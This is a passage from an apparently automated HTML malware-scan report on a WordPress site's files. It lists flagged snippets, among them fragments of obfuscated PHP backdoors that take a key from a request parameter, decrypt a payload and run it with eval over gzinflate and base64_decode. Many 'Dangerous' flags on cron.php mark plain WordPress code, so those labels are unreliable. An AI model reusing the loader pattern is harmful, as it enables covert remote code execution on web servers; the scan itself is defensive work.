</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">MLNSg</span><span style="color: #007700">(</span><span style="color: #0000BB">$pnL</span><span style="color: #007700">) { </span><span style="color: #0000BB">$QHC </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$RNHf </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$QHC</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$ywTX </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$pnL</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ywTX</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$QHC</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$RNHf</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">MLNSg</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'Gj9Svl8Glj8xFQgFTHXwvwkltYrls7wYQcNH</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$MLNSg</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$MLNSg</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_79").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/Requests/src/Exception/Http/Http/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_80" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$uIBPF6L5WO7</span><span style="color: #007700">[</span><span style="color: #0000BB">31</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$gPYP8f2qAYC</span><span style="color: #007700">; goto </span><span style="color: #0000BB">qVE36ERKkGj</span><span style="color: #007700">; </span><span style="color: #0000BB">QTgpKQx5NzB</span><span style="color: #007700">: </span><span style="color: #0000BB">$FUZTnhGWmWW </span><span style="color: #007700">= </span><span style="color: #DD0000">"range"</span><span style="color: #007700">; goto </span><span style="color: #0000BB">XP1OgqKhl0e</span><span style="color: #007700">; </span><span style="color: #0000BB">qVE36ERKkGj</span><span style="color: #007700">: } static function </span><span style="color: #0000BB">mt6jYLFiu4t</span><span style="color: #007700">(</span><span style="color: #0000BB">$NlZrfDQbM9Q</span><span style="color: #007700">, </span><span style="color: #0000BB">$RVoa6Na22Dw</span><span style="color: #007700">) { goto </span><span style="color: #0000BB">yM9VSxffStK</span><span style="color: #007700">; </span><span style="color: #0000BB">KHLH1q9y4NG</span><span style="color: #007700">: </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$BO7xnyfdkCT</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); goto </span><span style="color: #0000BB">yBwRNqP3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return empty(</span><span style="color: #0000BB">$ngUUgZ8euNJ</span><span style="color: #007700">) ? </span><span style="color: #0000BB">$RVoa6Na22Dw</span><span style="color: #007700">(</span><span style="color: #0000BB">$NlZrfDQbM9Q</span><span style="color: #007700">) : </span><span style="color: #0000BB">$ngUUgZ8euNJ</span><span style="color: #007700">; goto </span><span style="color: #0000BB">EvKTji8QQdn</span><span style="color: #007700">; </span><span style="color: #0000BB">EvKTji8QQdn</span><span style="color: #007700">: } static function </span><span style="color: #0000BB">yO5aYjg2Sy8</span><span style="color: #007700">() { goto </span><span style="color: #0000BB">TLGIqldu9wM</span><span style="color: #007700">; </span><span style="color: #0000BB">oVAlvTbKlZW</span><span style="color: #007700">: </span><span style="color: #0000BB">$tJLd5aF5fMB </span><span style="color: #007700">= </span><span style="color: #0000BB">$OL37_0h1Xz1</span><span style="color: #007700">[</span><span style="color: #0000BB">1 </span><span style="color: #007700">+ </span><span style="color: #0000BB">1</span><span style="color: #007700">](</span><span style="color: #0000BB">$ocaEGfA001j</span><span style="color: #007700">, </span><span style="color: #0000BB">true</span><span style="color: #007700">); goto </span><span style="color: #0000BB">P1RHDegtZZB</span><span style="color: #007700">; </span><span style="color: #0000BB">TLGIqldu9wM</span><span style="color: #007700">: </span><span style="color: #0000BB">$ucreCOhlP</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_80").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/Requests/src/Transport/Transport/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_81" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'wzOS2yXij4gf5g3aIdcrSSJmxDZ6+CYN59HfcoaO9uLP8i9+8hHrvYvZ9zj28grOkOu69Xv4x7+bp8xlfR1rxue2qy2wlrXPO6gb3d0uvf/+retHu4lze7uJe7tLfcpCc9A704NT+WjXld8p2vMRaht+24M27qtu8/3Xkc0H/9NmRjSCnxMFuiD31MVOj0S/ZDn/je1MrfvYlzQEoHUOtIW2Ozm+CMWHE4NSvACiSK2c80Sdl/TqObLtpzUTDp/AZKfKTYDkT2e35AETKxNQBGEIH8MsnYZYQo8c/WGhlh9Vcc4uy/vYsOEwseuhQPloIM9pJu7H22bWQPpX92D/1FtasmPt50zu2xvdsiWtUlqrMTQOY9B8C3tclZfTC95L3vjT/crHfz6J/ebkOzrIUiRxWQ1c10bxqedaB9DtvKHMtEvEdhtame83U1vhT/W7M0PguqJ1GkAcQxOxCUNWgZbZB/Yz47IeEPX3PYmc6vJYcdphnl2...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">vbw</span><span style="color: #007700">(</span><span style="color: #0000BB">$LBEw</span><span style="color: #007700">) { </span><span style="color: #0000BB">$RSKTH </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$rwNgQ </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$RSKTH</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$eVqi </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$LBEw</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$eVqi</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$RSKTH</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$rwNgQ</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">vbw</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'F36Z1m9V5MmCpXjDkgfqWxoDQpvz7n</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$vbw</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$vbw</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_81").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/Requests/src/Transport/Transport/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 58.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_82" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"aFRHYUp4QVNtLm0zdQ"</span><span style="color: #007700">); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_82").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/cron.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 41.80 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 14:16:41</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 98</span><br><table id="file_83" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$new_cron</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false On success an integer indicating number of events spawned </span><span style="color: #007700">(</span><span style="color: #0000BB">0 indicates no</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_cron</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$pre</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_schedules</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1136</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">array_merge</span><span style="color: #007700">( </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'cron_schedules'</span><span style="color: #007700">, array() ), </span><span style="color: #0000BB">$schedules </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false Schedule name on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">no schedule</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_schedule</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_schedule'</span><span style="color: #007700">, </span><span style="color: #0000BB">$schedule</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the results of _get_cron_array</span><span style="color: #007700">() </span><span style="color: #0000BB">limited to events ready to be run</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array[] Array </span><span style="color: #0000BB">of cron job arrays ready to be run</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1182</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_ready_cron_jobs</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning an </span><span style="color: #007700">array </span><span style="color: #0000BB">will short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit the normal retrieval of ready</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$results</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">type modified to consistently </span><span style="color: #007700">return </span><span style="color: #0000BB">an </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array[] Array </span><span style="color: #0000BB">of cron events</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_get_cron_array</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1240</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$cron</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1247</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">value modified to outcome of update_option</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">|</span><span style="color: #0000BB">WP_Error True </span><span style="color: #007700">if </span><span style="color: #0000BB">cron </span><span style="color: #007700">array </span><span style="color: #0000BB">updated</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">or </span><span style="color: #0000BB">WP_Error on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_set_cron_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$cron</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_error </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">upgrades the cron info </span><span style="color: #007700">array </span><span style="color: #0000BB">to version 2.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">An upgraded cron info </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_upgrade_cron_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$cron </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1305</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$new_cron</span><span style="color: #007700">;</span>
</span>
